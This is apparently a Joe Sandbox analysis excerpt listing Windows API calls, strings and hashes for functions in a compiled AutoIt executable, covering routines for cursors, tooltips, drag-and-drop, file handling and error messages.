                                                              • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00361256), ref: 003629FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: -es$AutoIt v3 GUI
                                                            • API String ID: 1458621304-1956769002
                                                            • Opcode ID: d6b4d0b903bf39bbc738f817ac4d703cec7388e633bc44833c766905aa886d25
                                                            • Instruction ID: 8945076a3ec82916408305ea3ce2c004ddb4cb636ce93b4c45370a8739cb87f0
                                                            • Opcode Fuzzy Hash: d6b4d0b903bf39bbc738f817ac4d703cec7388e633bc44833c766905aa886d25
                                                            • Instruction Fuzzy Hash: CCB18071600609DFDF26DFA8DC85BAE77B4FB48310F118225FA15AB2D4CBB49851CB54
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 003BA47A
                                                            • __swprintf.LIBCMT ref: 003BA51B
                                                            • _wcscmp.LIBCMT ref: 003BA52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BA583
                                                            • _wcscmp.LIBCMT ref: 003BA5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 003BA5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 003BA648
                                                            • GetWindowRect.USER32(?,?), ref: 003BA67E
                                                            • GetParent.USER32(?), ref: 003BA69C
                                                            • ScreenToClient.USER32(00000000), ref: 003BA6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 003BA71D
                                                            • _wcscmp.LIBCMT ref: 003BA731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 003BA757
                                                            • _wcscmp.LIBCMT ref: 003BA76B
                                                              • Part of subcall function 0038362C: _iswctype.LIBCMT ref: 00383634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                            • Instruction ID: 6e2b0b6292385114928e1dfb3262b5382f731e36f3678dafd7203fcfd68fbdbb
                                                            • Opcode Fuzzy Hash: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                            • Instruction Fuzzy Hash: 76A1C471204F06AFD716DF64C885BEAB7E8FF44358F004529FA99C6590DB30EA45CB92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 003BAF18
                                                            • _wcscmp.LIBCMT ref: 003BAF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 003BAF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 003BAF6E
                                                            • _wcscmp.LIBCMT ref: 003BAF8C
                                                            • _wcsstr.LIBCMT ref: 003BAF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 003BAFD5
                                                            • _wcscmp.LIBCMT ref: 003BAFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 003BB00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 003BB055
                                                            • _wcscmp.LIBCMT ref: 003BB065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 003BB08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 003BB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                            • Instruction ID: b4b482d3f0c820d0921c4ec5cbb9600f50391e2aa72949d9f4bbd9d0bd594607
                                                            • Opcode Fuzzy Hash: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
                                                            • Instruction Fuzzy Hash: 5081CF711083059FDB12DF14C881BFAB7E8EF44718F04856AFE858A095DB74DE45CB61
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 003EC627
                                                              • Part of subcall function 003EAB37: ClientToScreen.USER32(?,?), ref: 003EAB60
                                                              • Part of subcall function 003EAB37: GetWindowRect.USER32(?,?), ref: 003EABD6
                                                              • Part of subcall function 003EAB37: PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EC69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EC6BE
                                                            • _wcscat.LIBCMT ref: 003EC6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EC705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003EC71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 003EC757
                                                            • DragFinish.SHELL32(?), ref: 003EC75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EC851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbB
                                                            • API String ID: 169749273-33125029
                                                            • Opcode ID: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                            • Instruction ID: ea5b79ec9e6f17c6e3483cf75f10191c6b496df521f3720c933e7497498c47fa
                                                            • Opcode Fuzzy Hash: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
                                                            • Instruction Fuzzy Hash: 52616C71108341AFC712EF64DC85DAFBBE8EF89710F404A2EF5919A1E1DB709A49CB52
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                            • Instruction ID: f46f47d4be9a719d5b68257263f4a9d7883749c7063fff4da03bae8a0f8a7dfc
                                                            • Opcode Fuzzy Hash: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
                                                            • Instruction Fuzzy Hash: EA310431A88A09A7CA12FA50DD03FEE7BB49F10794F70402AF541BA4D5EF656F048656
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 003D5013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 003D501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 003D5029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 003D5034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 003D503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 003D504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 003D5055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 003D5060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 003D506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 003D5076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 003D5081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 003D508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 003D5097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 003D50A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 003D50AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 003D50B8
                                                            • GetCursorInfo.USER32(?), ref: 003D50C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                            • Instruction ID: b294713da227265ecbecd523568f8528cac6d83a90b62e7c538f65537a7cbc70
                                                            • Opcode Fuzzy Hash: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
                                                            • Instruction Fuzzy Hash: A33113B1D48319AADF119FB69C8996FBFECFF04750F50452BA50CE7280DA78A5048F91
                                                            APIs
                                                            • _memset.LIBCMT ref: 003EA259
                                                            • DestroyWindow.USER32(?,?), ref: 003EA2D3
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003EA34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003EA36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA382
                                                            • DestroyWindow.USER32(00000000), ref: 003EA3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00360000,00000000), ref: 003EA3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA3F4
                                                            • GetDesktopWindow.USER32 ref: 003EA40D
                                                            • GetWindowRect.USER32(00000000), ref: 003EA414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003EA42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003EA444
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                            • Instruction ID: 0c9f47ef533fd2e3b1a9f1444ca26df84b0923b839090c3036680a9488225e17
                                                            • Opcode Fuzzy Hash: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
                                                            • Instruction Fuzzy Hash: FA719D70140684AFD722DF29CC49F667BE9FB88304F45462DF9859B2E0C7B4E902CB56
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 003E4424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                            • Instruction ID: a3c21903c3770ffb72aae5cac2318d288445a338e13b09047dbda6be7b6b34b7
                                                            • Opcode Fuzzy Hash: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                            • Instruction Fuzzy Hash: B091AB746003108FCB0AEF11C452AAEB7E5AF99354F058969F8965F7E2CB34ED49CB81
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EB8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003E91C2), ref: 003EB910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003EB98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 003EB9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EB9DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,003E91C2), ref: 003EB9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EBA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EBA17
                                                              • Part of subcall function 00382EFD: __wcsicmp_l.LIBCMT ref: 00382F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                            • Instruction ID: ba2e5571981742d7de27db7519ab3c54047ea8a525ba8d311e345a486cf4a3d8
                                                            • Opcode Fuzzy Hash: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                            • Instruction Fuzzy Hash: 7461C071500269BFEB16DF65CC81FBBB7ACEB08710F108216F915DA1D1DBB4A980DBA0
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 003CDCDC
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 003CDCEC
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003CDCF8
                                                            • __wsplitpath.LIBCMT ref: 003CDD56
                                                            • _wcscat.LIBCMT ref: 003CDD6E
                                                            • _wcscat.LIBCMT ref: 003CDD80
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDD95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDA9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDDB
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDFC
                                                            • _wcscpy.LIBCMT ref: 003CDE08
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003CDE47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 3566783562-438819550
                                                            • Opcode ID: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                            • Instruction ID: 63eb0c0c7a0c361ae459d3cdb654d8b8839f391e8278b833a96d59a02ade4d08
                                                            • Opcode Fuzzy Hash: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                            • Instruction Fuzzy Hash: D06159765042459FCB11EF60C844EAEB3E8BF89314F04892EF999CB251DB71ED45CB92
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003C9C7F
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003C9CA0
                                                            • __swprintf.LIBCMT ref: 003C9CF9
                                                            • __swprintf.LIBCMT ref: 003C9D12
                                                            • _wprintf.LIBCMT ref: 003C9DB9
                                                            • _wprintf.LIBCMT ref: 003C9DD7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-3080491070
                                                            • Opcode ID: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                            • Instruction ID: 6b216ffa711c790f23f49b5a254fc7afdf0b033c1b4401397eb3c7399335a6bb
                                                            • Opcode Fuzzy Hash: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                            • Instruction Fuzzy Hash: D4517232900509AACF16FBE0CD46EEEB778AF14304F60406AF505B61A1DB352F59DF65
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 003CA3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 003CA418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA4C5
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003BF8DF
                                                            • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF8E8
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003BF90A
                                                            • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF90D
                                                            • __swprintf.LIBCMT ref: 003BF95D
                                                            • __swprintf.LIBCMT ref: 003BF96E
                                                            • _wprintf.LIBCMT ref: 003BFA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003BFA2E
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003E9207,?,?), ref: 003EBA56
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA78
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 003EBA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 003EBAA6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,003F2CAC,?), ref: 003EBAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 003EBAE7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 003EBB0B
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003EBB36
                                                            • DeleteObject.GDI32(00000000), ref: 003EBB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EBB74
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 003CDA10
                                                            • _wcscat.LIBCMT ref: 003CDA28
                                                            • _wcscat.LIBCMT ref: 003CDA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 003CDA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 003CDA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDAA7
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EC1FC
